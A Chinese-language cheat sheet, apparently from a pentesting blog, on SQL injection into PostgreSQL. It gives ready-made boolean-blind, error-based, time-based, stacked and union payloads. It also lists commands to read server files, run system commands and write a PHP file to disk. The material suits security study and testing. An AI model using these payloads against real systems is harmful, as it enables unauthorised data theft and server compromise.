PostgreSQL数据库的注入
目录
PostgreSQL
PostgreSQL常用查询命令
布尔盲注
错误注入
堆叠注入
时间盲注
联合查询
PostgreSQL
PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),4.2版本为基础的对象关系型数据库管理系统。
PostgreSQL安装后,默认的端口是:5432,默认的用户名是: postgres ,默认的数据库也是:postgres 。注释符:-- 延时函数:pg_sleep(3)
PostgreSQL和MySQL一样,也有 information_schema 数据库。
PostgreSQL安装后默认是不允许其他主机连接的,如果要让其他主机连接,找到PostgreSQL安装目录下的/data/pg_hba.conf, 找到“# IPv4 local connections:”,然后在下面添加你的IP地址
host all all 192.168.10.1/32 md5
PostgreSQL常用查询命令
- select CURRENT_SCHEMA() #查看当前权限
- select user #查看用户
- select current_user #查看当前用户
- select chr(97) #将ASCII码转为字符
- select chr(97)||chr(100)||chr(109)||chr(105)||chr(110) #将ASCII转换为字符串
- SELECT session_user;
- SELECT usename FROM pg_user;
- SELECT getpgusername();
- select version() #查看PostgreSQL数据库版本
- SELECT current_database() #查看当前数据库
- select length('admin') #查看长度
- select case when(expr1) then result1 else result2 end; #如果xx,执行result1,否则result2
- 例:select case when(current_user='postgres') then pg_sleep(5) else pg_sleep(0) end;
- select pg_read_file(filepath+filename); #读取文件
- select system("comamnd_string"); #执行系统命令
- COPY (select '<?php phpinfo();?>') to '/tmp/1.php'; #写入文件
布尔盲注
1 AND ASCII(SUBSTRING((SELECT COALESCE(CAST(COUNT(DISTINCT(schemaname)) AS CHARACTER(10000)),(CHR(32))) FROM pg_tables)::text FROM 1 FOR 1))>48
错误注入
报错注入需要目标网站开启了报错提示。
1 AND 2518=CAST((CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))||(SELECT COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32))) FROM pg_tables OFFSET 0 LIMIT 1)::text||(CHR(113)||CHR(112)||CHR(106)||CHR(98)||CHR(113)) AS NUMERIC)
堆叠注入
和MySQL的堆叠注入一样,在后面加上查询语句即可。
时间盲注
select pg_sleep(3)
联合查询
- order by 3 #查看显示列
- select null,null,函数
- 然后接下来就是和MySQL注入一样了,关于PostgreSQL的语句可以查看SQLMap
更多语句查看SQLMap
PostgreSQL数据库的注入相关推荐
- java dbaResult_数据库—从注入到提权的全家桶套餐
前言 偶然看到了最新的数据库流行度排名,发现在前5名的关系型数据库中,日常渗透测试见到最多的便是MySQL,排名第一的Oracle可能因为企业版高昂的价格限制了用户群众,在实际中相对于MySQL遇到的 ...
- python postgresql跨数据库查询_python访问PostgreSQL数据库之连接库Psycopg2
python访问PostgreSQL数据库之连接库Psycopg2 作者:佣工7001 由于要在python访问PostgreSQL数据库,需要一个符合DB-API的连接库.通过搜索,锁定两个候选库: ...
- 将PostgreSQL数据库扩展到每个月12亿条记录的经验教训
这不是我第一次使用大型数据集.我为最大的英国公共Wi-Fi供应商设计的认证和产品管理数据库也有巨大的容量.我们每天跟踪数百万设备的身份认证.然而,该项目有资金,允许我们选择任何硬件.任何支持服务以及聘 ...
- Debezium系列之:使用Debezium接入PostgreSQL数据库数据到Kafka集群的详细技术文档
Debezium系列之:使用Debezium接入PostgreSQL数据库数据到Kafka集群的详细技术文档 一.概述 二.连接器的工作原理 1.安全 2.快照 3.Ad hoc snapshots ...
- 【权限提升】61 Redis Postgresql数据库提权
目录 redis数据库权限提升 Redis未授权访问漏洞利用 1. 利用计划任务执行命令反弹shell 2. 写ssh-keygen公钥后 使用私钥登录 3. 往web路径写webshell 修复方案 ...
- Debezium系列之:Debezium2.X之PostgreSQL数据库的Debezium连接器
Debezium系列之:Debezium2.X之PostgreSQL数据库的Debezium连接器 一.概述 二.连接器的工作原理 1.安全 2.快照 3.临时快照 4.触发临时快照 5.增量快照 6 ...
- pg数据库开启远程连接_如何运行远程客户端连接postgresql数据库
如何运行远程客户端连接 postgresql 数据库 前提条件是 2 个: 1 , pg_hba.conf 里面配置了运行远程客户机连接 pg_hba.conf 配置后需要重新加载 reload 生效 ...
- 数据库服务器 之 PostgreSQL数据库的日常维护工作
来自:LinuxSir.Org 摘要:为了保持所安装的 PostgreSQL 服务器平稳运行, 我们必须做一些日常性的维护工作.我们在这里讨论的这些工作都是经常重复的事情, 可以很容易地使用标准的 U ...
- Centos 7环境下源码安装PostgreSQL数据库
马上就要去实习了,工作内容是搞数据仓库方面的,用的是postgresql关系型数据库,于是自己先来了解下这种数据的用法,之后说说这个数据库和MySQL的关系和区别. 1.Postgresql简介 看了 ...
最新文章
- 蚂蚁森林最高效的合种团队,新树冷杉6天合种成员招募
- C++对象的内存分析(2)
- android xutils3.0获取服务器图片,Android端使用xUtils3.0实现文件上传
- 3G助推智慧医疗 看病将更加“智能化”
- 看完就入门系列!吞吐量、消息持久化、负载均衡和持久化、伸缩性…… 你真的了解 Kafka 了吗?...
- 在 Windows 下部署 Go 语言环境
- RportViewer(20121023) 参数引起的异常
- 基于Seajs的可控台球碰撞游戏
- MySql多对多关系中外键的应用
- Atitit 减少财政支出之减少通讯支出 解决方案attilax总结
- js获取当前Url后面的指定参数
- matlab转换为函数表达式,matlab中将符号表达式转换为函数
- 《SolidWorks 2014中文版机械设计从入门到精通》——2.3 草图编辑
- 如何卸载Visio秘钥
- lib文件夹的作用和配置lib文件
- 仙人掌之歌——上线运营(2)
- 网站空间的流量是怎么算的?每月10G流量是什么意思,够用吗?
- [转]提交表单后 PHP获取提交内容 的方法
- DES 数据加密标准 结构详解
- GCN原理的直观解释
热门文章
- 零基础学Python-爬虫-1、网络请求Requests【网络操作理论基础与实践·请认真看看理论,理论基础决定后期高度】
- 关于vue项目的打包
- 一文弄懂神经网络中的反向传播法——BackPropagation【转】
- antd 刷新页面及后退时菜单栏高亮问题
- linux中awk工具的使用(转载)
- ElasticStack系列之八 _source 字段
- java之路漫漫(一)
- mysql没法修改数据_MySQL学习笔记之数据的增、删、改实现方法
- C#实现数据回滚,A事件和B事件同时执行,其中任何一个事件执行失败,都会返回失败...
- bootstrap_bootstrap中日历范围选择插件daterangepicker的使用